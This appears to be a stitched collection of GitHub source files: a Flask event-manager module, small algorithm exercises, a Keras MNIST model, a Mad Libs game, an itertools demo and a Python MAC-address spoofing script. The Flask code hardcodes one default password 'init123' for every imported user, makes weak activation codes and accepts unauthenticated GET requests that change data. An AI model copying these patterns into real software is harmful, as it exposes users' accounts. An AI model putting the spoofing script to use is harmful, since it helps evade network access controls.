full_name = ss[1]
accept_link = basic_url + url_for('upload.user_status') + '?event_id=' + event_id +'&email='+email+'&full_name='+full_name+'&choose=' + accept
reject_link = basic_url + url_for('upload.user_status') + '?event_id=' + event_id + '&email='+email+'&full_name='+full_name+'&choose=' + reject
send_email('Event Manager', ADMINS[0], [email], "Hello just for testing", \
render_template(template, full_name=full_name, accept_link= accept_link, reject_link= reject_link))
@upload.route('/user_status')
def user_status():
full_name = request.args.get("full_name")
event_id = request.args.get("event_id")
choose = request.args.get("choose")
email = request.args.get("email")
event = db.session.query(Event).filter(Event.event_id == event_id).first()
if event is not None and choose == "accept":
temp = EventAttender(event_id, full_name ,email)
db.session.add(temp)
db.session.commit()
send_email('Event Manager', ADMINS[0], [email], "reply", \
render_template("upload/accept_reply.html", full_name=full_name))
msg = 'Thank you for joining ' + event.name
result = 'Succeeded'
else:
msg = 'Thank you'
result = 'Failed'
return render_template('upload/reply_result.html', msg=msg, result=result, full_name= full_name)
def open_excel(path):
try:
data = xlrd.open_workbook(path)
return (data)
except Exception as e:
print (str(e))
def input_user_xls(path):
data = open_excel(path)
table=data.sheets()[0]
nrows=table.nrows
books=[]
for i in range(nrows):
ss=table.row_values(i)
if i == 0:
continue
# result = []
index = 0;
tempss = []
for s in ss:
tempss.append(s)
index = index + 1
if index == 9:
speaker_id = tempss[0]
rolename = tempss[1]
last_name = tempss[2]
first_name = tempss[3]
job = tempss[4]
department = tempss[5]
country = tempss[6]
email = tempss[7]
s1 = tempss[8]
user_id = ifcomma(s1)
title = ''
password = hash_password = generate_password_hash("init123")
if job == 'Mr.' or job == 'Ms.':
title = job
job = ''
active_code = generate_active_code()
usertemp = db.session.query(User).filter(User.user_id == user_id).first()
if usertemp is not None or user_id == '' or user_id is None:
print('user'+user_id+' already exists')
else:
temp=User(user_id, email, password, first_name, last_name, department,active_code,title, job, country, rolename, speaker_id)
db.session.add(temp)
db.session.commit()
tempss = []
index = 0
def input_topic_xls(path):
data = open_excel(path)
table=data.sheets()[0]
nrows=table.nrows
books=[]
for i in range(nrows):
ss=table.row_values(i)
if i == 0:
continue
topic_id = ss[0]
statustemp = ss[1]
format = ss[2]
content = ss[3]
title = ss[4]
description = ss[5]
memo = ss[6]
speaker1 = ifcomma(ss[7])
speaker2 = ifcomma(ss[8])
speaker3 = ifcomma(ss[9])
speaker4 = ifcomma(ss[10])
speaker5 = ifcomma(ss[11])
create_by = ifcomma(ss[12])
if statustemp == 'Accepted':
status = 'AP'
elif statustemp == 'Rejected':
status = 'RJ'
min_attendance = 0
max_attendance = 0
day_duration = '0'
hour_duration = '0'
minute_duration = '20'
year_start = '2016'
month_start = ''
day_start = ''
location = ''
link = ''
jamlink = ''
topictemp = db.session.query(Topic).filter(Topic.topic_id == topic_id).first()
if topictemp is not None or topic_id == '' or topic_id is None:
print(topic_id+'Topic already exists')
else:
temp=Topic(topic_id,title, description, min_attendance, max_attendance, speaker1, speaker2, speaker3, speaker4, speaker5, \
year_start, month_start, day_start,day_duration, hour_duration, minute_duration ,create_by,\
content, format, location, link, jamlink, memo, status)
db.session.add(temp)
db.session.commit()
def ifcomma(data):
an = re.search(',', data)
if an:
s1 = data.split(',')
user_id = s1[0]
else:
user_id = data
return user_id
def uploadtest():
print("upload successfully")
@upload.route('/test')
def test():
input_user_xls('uploads/test2.xlsx')
#Refresh the global variable before every request
@upload.before_request
def before_request():
g.user = current_user
global full_name, status, menu_categories
if hasattr(g.user, 'full_name'):
full_name = g.user.full_name
if hasattr(g.user, 'status'):
status = g.user.status
menu_categories = menus_of_role()
def generate_active_code():
pool = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
candidate = random.sample(pool, 4)
active_code = candidate[0] + candidate[1] + candidate[2] + candidate[3]
return str(active_code)
def menus_of_role():
middles = db.session.query(Role_menu).filter(Role_menu.role_id == g.user.role_id).all()
menu_categories = list()
cat_grouped_menus = list()
category_ids = list()
menu_ids = list()
for m in middles:
certain_menu = db.session.query(Menu).filter(Menu.menu_id == m.menu_id).first()
menu_ids.append(certain_menu.menu_id)
if certain_menu.category_id not in category_ids:
category_ids.append(certain_menu.category_id)
cat_grouped_menus.append(certain_menu)
for c in cat_grouped_menus:
c_menus = list()
cat = dict()
cat['category_id'] = c.category_id
cat['category_name'] = c.category_name
menus = db.session.query(Menu).filter(Menu.category_id == c.category_id).filter().all()
for m in menus:
if m.menu_id in menu_ids:
each_menu = dict()
each_menu['menu_id'] = m.menu_id
each_menu['menu_name'] = m.menu_name
each_menu['url'] = m.url
c_menus.append(each_menu)
cat['menus'] = c_menus
menu_categories.append(cat)
# print (menu_categories)
return menu_categories
| yefeiyang0806/Event-Manager | EventManager/app/upload/views.py | views.py | py | 10,174 | python | en | code | 0 | github-code | 90 |
24999584615 | def transpose(matrix: [[int]]) -> [[int]]:
m, n = len(matrix), len(matrix[0])
res = [[0 for _ in range(m)] for _ in range(n)]
for i in range(m):
for j in range(n):
res[j][i] = matrix[i][j]
return res
if __name__ == '__main__':
print(transpose([[1,2,3],[4,5,6],[7,8,9],[0,0,0]]))
| Lycorisophy/LeetCode_python | 简单题/867.转置矩阵.py | 867.转置矩阵.py | py | 321 | python | en | code | 1 | github-code | 90 |
36665221537 | INPUT = [int(i) for i in input().split()]
N, W = INPUT[0], INPUT[1]
TC = 0
CHEESE = []
for i in range(N):
INPUT = [int(x) for x in input().split()]
CHEESE.append([INPUT[0], INPUT[1]])
CHEESE = sorted(CHEESE, reverse=True)
for c in CHEESE:
TC += c[0] * min(W, c[1])
W -= min(W, c[1])
if W <= 0:
break
print(TC)
| ringedSquid/Stuy_CCC_Potd | atcoder/abc229_c.py | abc229_c.py | py | 341 | python | en | code | 0 | github-code | 90 |
41317810716 | """ Mad Libs Generator """
# story 1
def p_story1():
print("************************")
print ("Zoo")
print("************************")
print (f"Today I went to the zoo. I saw a(n) {adjective1} {noun1} jumping up and down on its tree. " \
f"He {verb_p1} {adverb1} through the large tunnel that led to its {adjective2} {noun2}. " \
f"I got some peanuts and passed them through the cage to a gigantic gray {noun3} towering above my head. " \
f"Feeding that animal mademe hungry. " \
f"I went to get a {adjective3} scoop of ice cream. " \
f"It filled my stomach. Afterwards I had to {verb1} {adverb2} to catch our bus." \
f"When I got home I {verb_p2} my mom for a {adjective4} day at the zoo.")
print("************************")
#story 2
def p_story2():
print("************************")
print ("Jungle")
print("************************")
print (f"I walk through the color jungle. I take out my {adjective1} canteen. "
f"There's a {adjective2} parrot with a {adjective3} {noun1} in his mouth right there in front "
f"of me in the {adjective4} trees! I gaze at his {adjective1} {noun2}. "
f"A sudden sound awakes me from my daydream! "
f"A panther’s {verb1} in front of my head! I {verb2} his {adjective2} breath. I remember I have a packet of {noun3} "
f"that makes go into a deep slumber! I {verb1} it away from me in front of the {noun1}. Yes he's eating it! "
f"I {verb2} away through the {adjective3} jungle. "
f"I meet my parents at the tent. Phew! It’s been an exciting day in the jungle. ")
print("************************")
# All the questions that the program asks the user
print("Select story. ")
print("1. Zoo")
print("2. Jungle")
print("3. story")
print("4. story")
print("Type 'quit' to exit")
print(" ")
run = True
while run:
choice = input("Enter story number: ")
if choice in ('1', '2', '3', '4'):
noun1 = 'monkey'
noun2 = 'cat'
noun3 = 'elephant'
adjective1 = 'naughty'
adjective2 = 'fat'
adjective3 = 'big'
adjective4 = 'amazing'
verb1 = 'run'
verb2 = 'jump'
adverb1 = 'blind'
adverb2 = 'fast'
verb_p1 = 'slided'
verb_p2 = 'told'
"""
noun1 = input("Choose a noun: ")
noun2 = input("Choose a noun: ")
noun3 = input("Choose a noun: ")
adjective1 = input("Choose an adjective: ")
adjective2 = input("Choose an adjective: ")
adjective3 = input("Choose an adjective: ")
adjective4 = input("Choose an adjective: ")
verb1 = input("Choose a verb: ")
verb2 = input("Choose a verb: ")
adverb1 = input("Choose a adverb: ")
adverb2 = input("Choose a adverb: ")
verb_p1 = input("Choose a verb in past tense: ")
verb_p2 = input("Choose a verb in past tense: ")
"""
if choice == '1':
print("Zoo Story selected")
print(p_story1())
elif choice == '2':
print("Jungle Story selected")
print(p_story2())
elif choice == '3':
print("story 3")
elif choice == '4':
print("story 4")
else:
if choice == "quit":
print("Quiting")
run = False | ViGi7520/Python_basic_codes | madlips.py | madlips.py | py | 3,409 | python | en | code | 0 | github-code | 90 |
18061324259 | import math
import sys
input = sys.stdin.readline
a, b, c = map(int, input().split())
x = (a//2)*b*c
x = abs(abs(x-a*b*c)-x)
y = (b//2)*a*c
y = abs(abs(y-a*b*c)-y)
z = (c//2)*a*b
z = abs(abs(z-a*b*c)-z)
print(min(x, y, z)) | Aasthaengg/IBMdataset | Python_codes/p04005/s565092068.py | s565092068.py | py | 224 | python | en | code | 0 | github-code | 90 |
27091794058 | from spack import *
class Lordec(MakefilePackage):
"""LoRDEC is a program to correct sequencing errors in long reads from
3rd generation sequencing with high error rate, and is especially
intended for PacBio reads."""
homepage = "http://www.atgc-montpellier.fr/lordec/"
url = "https://gite.lirmm.fr/lordec/lordec-releases/uploads/e3116a5f251e46e47f7a3b7ddb2bd7f6/lordec-src_0.8.tar.gz"
version('0.8', 'd5a57db681d1cd31c516aa780ce53f9d')
depends_on('boost')
depends_on('cmake@3.1.0:', type='build')
build_targets = ['clean', 'all']
def install(self, spec, prefix):
install_tree('.', prefix.bin)
| matzke1/spack | var/spack/repos/builtin/packages/lordec/package.py | package.py | py | 654 | python | en | code | 2 | github-code | 90 |
28265589091 | #########################################################################
# ---------> FILE: gen.py
# ---------> AUTHOR: Max Xu
# ---------> MAIL: xuhuan@live.cn
# ---------> DATE: 05/03/2017 TIME:11:25:55
#########################################################################
# !/usr/bin/env python
# coding=utf-8
import os
import sys
import csv
import time
from datetime import datetime
import numpy as np
import pandas as pd
from pandas import Series, DataFrame
DATE_START_TIME = "2010-1-1 10:00:00"
DATE_END_TIME = "2010-12-31 23:00:00"
DATE_FREQUENCY = "H"
TAG_NEGTIVE = "normal"
TAG_POSITIVE = "anormal"
OUTPUT_FILE = '../dataset/data.csv'
ANORMAL_COUNT = 3 # anormaly series count
ANORMAL_PERCENT = 20 # anormal_size = data_size / percent
def gen_0():
with open(OUTPUT_FILE, 'w') as f:
# timestamp
timestamp = pd.date_range(DATE_START_TIME, DATE_END_TIME, freq=DATE_FREQUENCY)
data_size = len(timestamp)
# v0
v0_data = np.random.uniform(0, 0.1, size=data_size) + 1
# v1
t = np.arange(0.0, float(data_size * 100), 0.01)
v1_data = np.sin(2 * np.pi * t) + 1
# headers = ["timestamp", "v0", "v1", "v2", "v3", "v4", "v5", "tag"]
headers = ["timestamp", "v0", "v1", "tag"]
writer = csv.DictWriter(f, fieldnames=headers, extrasaction="ignore")
writer.writeheader()
for (i, t) in enumerate(timestamp):
d = [t]
if i % 78 == 0:
d.append(v0_data[i] + 1)
d.append(v1_data[i] + 1)
d.append(TAG_POSITIVE)
else:
d.append(v0_data[i])
d.append(v1_data[i])
d.append(TAG_NEGTIVE)
d = dict(zip(headers, d))
writer.writerow(d)
print(d)
def gen_1():
"""
np.sin generate wave. wave1 + wave2 + wave3
:return:
"""
with open(OUTPUT_FILE, 'w') as f:
# timestamp
timestamp = pd.date_range(DATE_START_TIME, DATE_END_TIME, freq=DATE_FREQUENCY)
data_size = len(timestamp)
# tag
tag = [TAG_NEGTIVE] * data_size
# wave1 is normal (base)
t = np.arange(0.0, float(data_size) / 100, 0.01)
wave1 = np.sin(2 * 2 * np.pi * t) + 1
noise = np.random.normal(0, 0.1, len(t))
wave1 = wave1 + noise
# wave2 is normal (base)
wave2 = np.sin(2 * np.pi * t)
# wave3 is anormal
anormal_size = int(round(data_size / ANORMAL_PERCENT))
t_anormal = np.arange(0.0, float(anormal_size) / 100, 0.01)
wave3 = np.sin(10 * np.pi * t_anormal)
# Randomly insert anomal
for position in np.random.rand(ANORMAL_COUNT):
insert = int(round(position * len(t)))
wave1[insert:insert + anormal_size] = wave1[insert:insert + anormal_size] + wave3
tag[insert:insert + anormal_size] = [TAG_POSITIVE] * anormal_size
# Fixly insert anomal
# insert = int(round(0.13 * len(t)))
# wave1[insert:insert + anormal_size] = wave1[insert:insert + anormal_size] + wave3
# tag[insert:insert + anormal_size] = [TAG_POSITIVE] * anormal_size
#
# insert = int(round(0.3 * len(t)))
# wave1[insert:insert + anormal_size] = wave1[insert:insert + anormal_size] + wave3
# tag[insert:insert + anormal_size] = [TAG_POSITIVE] * anormal_size
#
# insert = int(round(0.8 * len(t)))
# wave1[insert:insert + anormal_size] = wave1[insert:insert + anormal_size] + wave3
# tag[insert:insert + anormal_size] = [TAG_POSITIVE] * anormal_size
# v0
v0_data = wave1 + wave2
# headers = ["timestamp", "v0", "v1", "v2", "v3", "v4", "v5", "tag"]
headers = ["timestamp", "v0", "tag"]
writer = csv.DictWriter(f, fieldnames=headers, extrasaction="ignore")
writer.writeheader()
for (i, t) in enumerate(timestamp):
d = [t]
d.append(v0_data[i])
d.append(tag[i])
d = dict(zip(headers, d))
writer.writerow(d)
print(d)
def main():
gen_1()
if __name__ == "__main__":
start = time.time()
print("Start: " + str(start))
main()
elapsed = (time.time() - start)
print("Time Usage: " + str(elapsed))
| maxsxu/MTSAnomalyDetection | util/gen_data.py | gen_data.py | py | 4,358 | python | en | code | 25 | github-code | 90 |
27308750631 | from gold.statistic.MagicStatFactory import MagicStatFactory
from gold.statistic.Statistic import Statistic
from gold.statistic.GraphStat import GraphStat
from quick.statistic.PositionToGraphNodeIdStat import PositionToGraphNodeIdStat
from gold.statistic.FormatSpecStat import FormatSpecStat
from gold.track.TrackFormat import TrackFormatReq
import numpy as np
#from quick.util.CommonFunctions import isNan
#class ColocalizationIn3dAssumingCompleteGraphStatSplittable(StatisticSumResSplittable):
# pass
class ColocalizationIn3dAssumingCompleteGraphStat(MagicStatFactory):
pass
class ColocalizationIn3dAssumingCompleteGraphStatUnsplittable(Statistic):
def _compute(self):
graph = self._graphStat.getResult()
subgraph_ids = self._position2NodeId.getResult()
subgraph = graph.getNewSubGraphFromNodeIdSet(subgraph_ids)
subgraph_as_matrix = subgraph.getMatrixFromCompleteGraph()
if subgraph_as_matrix is None:
return None
# try:
subgraph_as_matrix_without_nan = np.ma.masked_array(subgraph_as_matrix, np.isnan(subgraph_as_matrix))
# except:
# numNodes = sum(1 for x in graph.getNodeIter())
# print "#nodes", numNodes, numNodes**2
# print "#edges", sum(1 for x in graph.getEdgeIter())
# print [len(x) for x in subgraph_as_matrix]
# raise
# print "Subgraph as matrix:", subgraph_as_matrix
res = np.ma.mean(subgraph_as_matrix_without_nan)
if type(res) == np.ma.core.MaskedConstant:
res = None
return res
def _createChildren(self):
self._graphStat = self._addChild(GraphStat(self._region, self._track))
self._position2NodeId = self._addChild(PositionToGraphNodeIdStat(self._region, self._track, self._track2))
dummyStat = self._addChild( FormatSpecStat(self._region, self._track2, TrackFormatReq(allowOverlaps=False)))
| uio-bmi/track_rand | lib/hb/quick/statistic/ColocalizationIn3dAssumingCompleteGraphStat.py | ColocalizationIn3dAssumingCompleteGraphStat.py | py | 1,942 | python | en | code | 1 | github-code | 90 |
22211679449 | from scipy.stats import beta
from scipy.stats import bernoulli as bern
import numpy as np
import matplotlib.pyplot as plt
def main():
# 学習データ生成
batch_number = 4
train_size = 400
batch_size = int(train_size / batch_number)
mu = 0.7 # 実際のμの値
X = bern.rvs(mu,size = train_size)
X = X.reshape([batch_number,-1])
# 事前分布はBeta分布(ベルヌーイ分布の共役事前分布)で与える。
a, b = 0.5, 0.5
plot_beta(a,b,"Prior")
# 学習
for i in range(batch_number):
a = learn_a(a,X[i])
b = learn_b(b,X[i])
plot_beta(a,b,label='N=' + str((i+1)*batch_size))
plt.legend(loc='upper left')
plt.show()
def plot_beta(a,b,label=""):
xaxis = np.arange(0,1,0.001)
post = beta.pdf(xaxis,a,b)
plt.plot(xaxis,post,label=label)
def learn_a(a,X):
return sum(X) + a
def learn_b(b,X):
return X.shape[0] - sum(X) + b
if __name__ == "__main__":
main()
| elkel53930/machine_learning_by_bayes | ch03/bern.py | bern.py | py | 977 | python | en | code | 0 | github-code | 90 |
31114067596 | #!/usr/bin/python3
import sys
for line in sys.stdin:
line = line.strip()
column = line.split(",")
city = column[1]
country = column[2]
year_2021 = column[3]
city1 = "".join(c for c in city if c.isalpha())
country1 = "".join(c for c in country if c.isalpha())
#year_2021_1 = "".join(c for c in year_2021 if c.isalpha())
print('{0}\t{1}\t{2}'.format(country1,city1,year_2021))
| gabrielecosta/big-data-dataset | inquinamento/mapper.py | mapper.py | py | 389 | python | en | code | 0 | github-code | 90 |
804565301 | expected_outcomes = {"X": "LOSE", "Y": "DRAW", "Z": "WIN"}
winning_outcomes = {"A": "Y", "B": "Z", "C": "X"}
draw_outcomes = {"A": "X", "B": "Y", "C": "Z"}
losing_outcomes = {"A": "Z", "B": "X", "C": "Y"}
move_scores = {"X": 1, "Y": 2, "Z": 3}
outcome_scores = {"WIN": 6, "DRAW": 3, "LOSE": 0}
total_score = 0
with open("input.txt", "r") as file:
lines = file.readlines()
for line in lines:
parts = line.split()
total_score += outcome_scores[expected_outcomes[parts[1]]]
if expected_outcomes[parts[1]] == "WIN":
total_score += move_scores[winning_outcomes[parts[0]]]
elif expected_outcomes[parts[1]] == "DRAW":
total_score += move_scores[draw_outcomes[parts[0]]]
else:
total_score += move_scores[losing_outcomes[parts[0]]]
print(total_score) | kneedels/adventOfCode2022 | day2/part2.py | part2.py | py | 829 | python | en | code | 0 | github-code | 90 |
24261443392 | from tensorflow.examples.tutorials.mnist import input_data
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Activation, Convolution2D, MaxPooling2D, Dropout, Flatten
from keras.utils import np_utils
# mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
model = Sequential()
# 5×5のフィルタで 1channel を 32channel へ
model.add(Convolution2D(nb_filter = 32, nb_row = 3, nb_col = 3, border_mode='same', input_shape=(28, 28, 1)))
model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# 5×5のフィルタで 32channel を 64channelへ
model.add(Convolution2D(nb_filter = 64, nb_row = 3, nb_col = 3, border_mode='same'))
model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
# 1024へ
model.add(Dense(output_dim=1024))
model.add(Activation('relu'))
model.add(Dropout(0.5))
# 10の分類へ
model.add(Dense(output_dim=10))
model.add(Activation('softmax'))
# sgd = stochastic gradient descent 確率的勾配降下法
# binary_crossentropy = logloss としても知られている?
# categorical_crossentropy = マルチクラスloglossとしても知られています
model.summary()
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
img_rows, img_cols = 28, 28
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)
nb_classes = 10
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
input_shape = (img_rows, img_cols, 1)
# nb_epoch 1エポックは学習において訓練データをすべて使い切ったら1エポック
model.fit(X_train, Y_train, nb_epoch=1, batch_size=100, verbose=1)
score = model.evaluate(X_test, Y_test, verbose=1)
print()
# 誤差とaccuracyが表示される
# 99.44%ぐらい
print(score)
| tsuchikazu/playground | machine-leaning/keras/Deep_MNIST_for_Experts.py | Deep_MNIST_for_Experts.py | py | 1,989 | python | en | code | 0 | github-code | 90 |
4951934666 | # [기초-2차원배열] 바둑알 십자 뒤집기
# 부모님을 기다리던 영일이는 검정/흰 색 바둑알을 바둑판에 꽉 채워 깔아 놓고 놀다가...
# "십(+)자 뒤집기를 해볼까?"하고 생각했다.
# 바둑판(19 * 19)에 흰 돌(1) 또는 검정 돌(0)이 모두 꽉 채워져 놓여있을 때,
# n개의 좌표를 입력받아 십(+)자 뒤집기한 결과를 출력하는 프로그램을 작성해보자.
# 참고
# 가로 번호, 세로 번호를 사용할 수 있는 2차원 배열을 사용하면
# 이러한 형태를 쉽게 기록하고 사용할 수 있다. 물론 더 확장한 n차원 배열도 만들 수 있다.
# 배열 입력 방법
m = []
for _ in range(19):
m.append(input().split()) # 0과 1을 문자열로 입력받는 것을 유의
t = int(input())
for tc in range(t):
a,b = list(map(int, input().split()))
for i in range(19): # 행 먼저 바뀜
if m[a-1][i] == '0':
m[a-1][i] = '1'
else:
m[a-1][i] = '0'
for j in range(19): # 그 후 열 바뀜
if m[j][b-1] == '0':
m[j][b-1] = '1'
else:
m[j][b-1] = '0'
for x in m:
for y in x:
print(y, end=' ')
print()
# # 다른 출력 방법
# for x in range(19):
# for y in range(19):
# print(m[x][y], end=' ')
# print()
# 모범답안
# m=[]
# for i in range(20) :
# m.append([])
# for j in range(20) :
# m[i].append(0)
# for i in range(19) :
# a=input().split()
# for j in range(19) :
# m[i+1][j+1]=int(a[j])
# n=int(input())
# for i in range(n) :
# x,y=input().split()
# for j in range(1, 20) :
# if m[j][int(y)]==0 :
# m[j][int(y)]=1
# else :
# m[j][int(y)]=0
# if m[int(x)][j]==0 :
# m[int(x)][j]=1
# else :
# m[int(x)][j]=0
# for i in range(1, 20) :
# for j in range(1, 20) :
# print(m[i][j], end=' ')
# print() | jsj0718/til-study-legacy | Algorithm/CodeUp100/1097.py | 1097.py | py | 2,032 | python | ko | code | 0 | github-code | 90 |
18158626939 | from functools import reduce
from fractions import gcd
import math
import bisect
import itertools
import sys
sys.setrecursionlimit(10000000)
input = sys.stdin.readline
INF = float("inf")
MOD = 1000000007
class Combination(object):
def __init__(self, N):
self.fac = [0] * (N + 1)
self.inv = [0] * (N + 1)
self.finv = [0] * (N + 1)
self.fac[0] = 1
self.finv[0] = 1
if N > 0:
self.fac[1] = 1
self.inv[1] = 1
self.finv[1] = 1
# 前計算
for i in range(2, N + 1):
self.fac[i] = self.fac[i - 1] * i % MOD
self.inv[i] = self.inv[MOD % i] * (MOD - (MOD // i)) % MOD
self.finv[i] = self.finv[i - 1] * self.inv[i] % MOD
def com(self, N, k):
return (self.fac[N] * self.finv[k] * self.finv[N - k]) % MOD
# 処理内容
def main():
S = int(input())
Com = Combination(S)
ans = 0
i = 1
S -= 3
while S >= 0:
ans += Com.com(S+i-1, i-1)
ans %= MOD
S -= 3
i += 1
print(ans)
if __name__ == '__main__':
main() | Aasthaengg/IBMdataset | Python_codes/p02555/s972837020.py | s972837020.py | py | 1,124 | python | en | code | 0 | github-code | 90 |
71186118696 | #Task 1
best_emp_name = 0
best_emp = 0
p = 0
hpay = 0
pay1 = 0
pay2 = 0
pay3 = 0
pay4 = 0
pay5 = 0
for i in range (1,31):
emp_name = input("Enter Your Name: ")
emp_num = int(input("Enter Number: "))
hrs = int(input("Enter Number of hours worked: "))
#Task 2
if hrs < 5:
p=0
pay1 = pay1 + 1
elif hrs >= 5 and hrs <= 9:
p=70
pay2 = pay2 + 1
elif hrs >=10 and hrs <= 14:
p=100
pay3 = pay3 + 1
elif hrs >= 15 and hrs <= 18:
p=150
pay4 = pay4 + 1
elif hrs >=19:
p=200
pay5 = pay5 + 1
hr_pay = hrs * p
print("Your Pay :", hr_pay)
if hpay < hrs:
hpay = hrs
best_emp_name = emp_name
best_emp_num = emp_num
best_emp_pay = hr_pay * 1.2
print("Best employee is,", best_emp_name)
print("Best Employee number is,", best_emp_num)
print("New Pay for Best Employee is,", best_emp_pay)
#Task 3
print("Total Number of Employees who work less thn 5 hours-", pay1)
print("Total Number of Employees who work between 5 and 9 hours-", pay2)
print("Total Number of Employees who work between 10 and 14 hours-", pay3)
print("Total Number of Employees who work between 15 and 18 hours-", pay4)
print("Total Number of Employees who work more than 19 hours-", pay5)
| aneesh27/Projects | Pre Release for summative.py | Pre Release for summative.py | py | 1,304 | python | en | code | 0 | github-code | 90 |
44020025852 | import unittest
"""
Returns true if given number is prime.
Introductory (school) method:
Test if n is prime => check for all values from 2 through sqrt(n) to see if the value divides n.
If no value divides n, then return True.
With the exclusion of 2 and 3, all primes are of the form 6k+1 or 6k-1. So, a better way to test is to
try all numbers of the form 6k+1 and 6k-1 instead of all numbers till sqrt(n).
"""
def is_prime(number):
if number <= 1:
return False
if number <= 3:
return True
if number % 2 == 0 or number % 3 == 0:
return False
i = 5
while i * i <= number:
if number % i == 0 or number % (i+2) == 0:
return False
i += 6
return True
class TestPrimality(unittest.TestCase):
def test_is_prime(self):
self.assertTrue(is_prime(11))
self.assertFalse(is_prime(15))
| prathamtandon/g4gproblems | Math/is_prime.py | is_prime.py | py | 878 | python | en | code | 3 | github-code | 90 |
24178564407 | import numpy as np
import logging
from evaluation.unsupervised_metrics.correlation import gaussian_total_correlation, gaussian_wasserstein_correlation
from evaluation.unsupervised_metrics.mutual_info import discrete_mutual_info, discrete_entropy
from evaluation.shared import generate_batch_factor_code
def unsupervised_metrics(
ground_truth_data,
representation_fn,
random_state,
num_train,
batch_size=32):
"""Computes unsupervised scores based on covariance_regularizer and mutual information.
Args:
ground_truth_data: GroundTruthData to be sampled from.
representation_fn: Function that takes observations as input and
outputs a dim_representation sized representation for each observation.
random_state: Numpy random state used for randomness.
artifact_dir: Optional path to directory where artifacts can be saved.
num_train: Number of points used for training.
batch_size: Batch size for sampling.
Returns:
Dictionary with scores.
"""
scores = {}
mus_train, _ = generate_batch_factor_code(
ground_truth_data,
representation_fn,
num_train,
random_state,
batch_size
)
num_codes = mus_train.shape[0]
cov_mus = np.cov(mus_train)
assert num_codes == cov_mus.shape[0]
# Gaussian total correlation.
scores["gaussian_total_correlation"] = gaussian_total_correlation(cov_mus)
# Gaussian Wasserstein correlation.
scores["gaussian_wasserstein_correlation"] = gaussian_wasserstein_correlation(cov_mus)
scores["gaussian_wasserstein_correlation_norm"] = (scores["gaussian_wasserstein_correlation"] / np.sum(np.diag(cov_mus)))
# Compute average mutual information between different factors.
mus_discrete = discrete_entropy(mus_train).reshape(-1,1)
mutual_info_matrix = discrete_mutual_info(mus_discrete, mus_discrete)
np.fill_diagonal(mutual_info_matrix, 0)
mutual_info_score = np.sum(mutual_info_matrix) / (num_codes**2 - num_codes)
scores["mutual_info_score"] = mutual_info_score
return scores
| kkahloots/Generative_Models | evaluation/unsupervised_metrics/disentangle_api.py | disentangle_api.py | py | 2,180 | python | en | code | 1 | github-code | 90 |
21650432472 | #!/usr/bin/env python
import subprocess
import optparse
import re
def get_arguments():
# Object to Handle or Parse User Inputs Using Arguments
parser = optparse.OptionParser()
# Adding Options to Parser Object
parser.add_option("-i", "--interface", dest="interface", help="Network Interface to Change MAC Address")
parser.add_option("-m", "--mac", dest="new_mac", help="New MAC Address")
# Return Arguments & Values
(options, arguments) = parser.parse_args()
if not options.interface:
parser.error("[+] Please Specify an Interface, use --help for More Info")
elif not options.new_mac:
parser.error("[+] Please Specify a New MAC, use --help for More Info")
return options
def change_mac(interface, new_mac):
# A Much More Secure Version
print("\n[+] Changing MAC Address for " + interface + " to " + new_mac + "\n")
subprocess.call(["ifconfig", interface, "down"])
subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
subprocess.call(["ifconfig", interface, "up"])
print("[+] Interface MAC Address Successfully Changed!\n")
# subprocess.call(["ifconfig", interface])
def get_current_mac(interface):
ifconfig_result = subprocess.check_output(["ifconfig", interface])
# print(ifconfig_result)
mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", str(ifconfig_result))
if mac_address_search_result:
return mac_address_search_result.group(0)
else:
print("[-] Could not read MAC address.")
# interface = options.interface
# new_mac = options.new_mac
# Function Calls
options = get_arguments()
current_mac = get_current_mac(options.interface)
print("Current MAC Address = " + str(current_mac))
change_mac(options.interface, options.new_mac)
current_mac = get_current_mac(options.interface)
if current_mac == options.new_mac:
print("[+] MAC address was successfully changed to " + current_mac)
else:
print("[-] Mac address change was not successful")
# For Python 2, use raw_input()
# interface = input("Please Enter Network Interface >")
# new_mac = input("Please Enter New MAC Address >")
# print("[+] Changing MAC Address for " + interface + " to " + new_mac)
# subprocess.call("ifconfig " + interface + " down", shell=True)
# subprocess.call("ifconfig " + interface + " hw ether " + new_mac, shell=True)
# subprocess.call("ifconfig " + interface + " up", shell=True)
# print("[+] Interface MAC Address Successfully Changed!")
# subprocess.call("ifconfig " + interface, shell=True)
| pentestcave/Automation-Tooling | mac-changer/mac-changer.py | mac-changer.py | py | 2,552 | python | en | code | 0 | github-code | 90 |
71794428777 | import itertools
# 1. 组合生成器
# 组合可迭代对象
for item in itertools.product([1, 2, 3, 4], [5, 6, 7, 8]):
print(item)
# 对可迭代对象的元素生成不同的排列组合 组合的个元素顺序不同
print(list(itertools.permutations([1, 2, 3, 4])))
# 对可迭代对象的元素生成不同的排列组合 组合的个元素顺序不同(指定长度)
print(list(itertools.permutations([1, 2, 3, 4], 2)))
# 对可迭代对象的元素生成不同的排列组合 不考虑元素顺序(指定长度)
print(list(itertools.combinations([1, 2, 3, 4], 2)))
# 2.无限迭代器
# 作用: 返回以start开头的均匀间隔step步长的值
for item in itertools.count(10, 3):
if item > 100:
break
print(item)
# 作用:保存迭代对象的每个元素的副本,无限的重复返回每个元素的副本
its = ["a", "b", "c", "d"]
# for item in itertools.cycle(its):
# print(item)
# 按照指定的迭代次数重复返回每次的迭代对象
for item in itertools.repeat(its, 4):
print(item)
# 3.有限迭代器
# 作用:返回所有可迭代序列
its = ["a", "b", "c", "d"]
hers = ["A", "B", "C", "D"]
others = ["1", "2", "3", "4"]
for item in itertools.chain(its, hers, others):
print(item)
# 返回数据对象中对应规则为True的元素
its = ["a", "b", "c", "d", "e", "f", "g", "h"]
selector = [True, False, 1, 0, 3, False, -2, "y"]
for item in itertools.compress(its, selector):
print(item)
print(list(range(5)))
